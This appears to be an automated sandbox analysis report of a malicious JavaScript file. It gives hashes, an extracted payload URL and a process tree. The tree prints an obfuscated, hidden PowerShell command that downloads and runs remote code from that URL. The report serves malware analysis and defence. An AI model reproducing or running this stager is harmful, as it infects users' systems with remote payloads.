Analysis
-
max time kernel
0s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
06-01-2024 10:06
Static task
static1
Behavioral task
behavioral1
Sample
45eba6f313f6042b4f0d026f2454c4c6.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
45eba6f313f6042b4f0d026f2454c4c6.js
Resource
win10v2004-20231215-en
General
-
Target
45eba6f313f6042b4f0d026f2454c4c6.js
-
Size
72KB
-
MD5
45eba6f313f6042b4f0d026f2454c4c6
-
SHA1
f70c24851d9c0588b84906f719de779294622a1f
-
SHA256
a151649d286219f797af47de4299140d797c14ba0a733042b9c252c2da8e6684
-
SHA512
ab5e44e8eea52349d251b5e5d7b2b61723fff4889cc4a64cf09019762d93f89d8c2a0c7cbd9ae704b9c6cd063dec8f3d14adff3765dd024ecb2a77282364a3e2
-
SSDEEP
1536:hSvVfD5Xm9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bs:hStfDs9Ry98guHVBqqg2bcruzUHmLKeg
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1764 wrote to memory of 2224 1764 wscript.exe 23 PID 1764 wrote to memory of 2224 1764 wscript.exe 23 PID 1764 wrote to memory of 2224 1764 wscript.exe 23
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\45eba6f313f6042b4f0d026f2454c4c6.js1⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵PID:2224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA1⤵PID:2388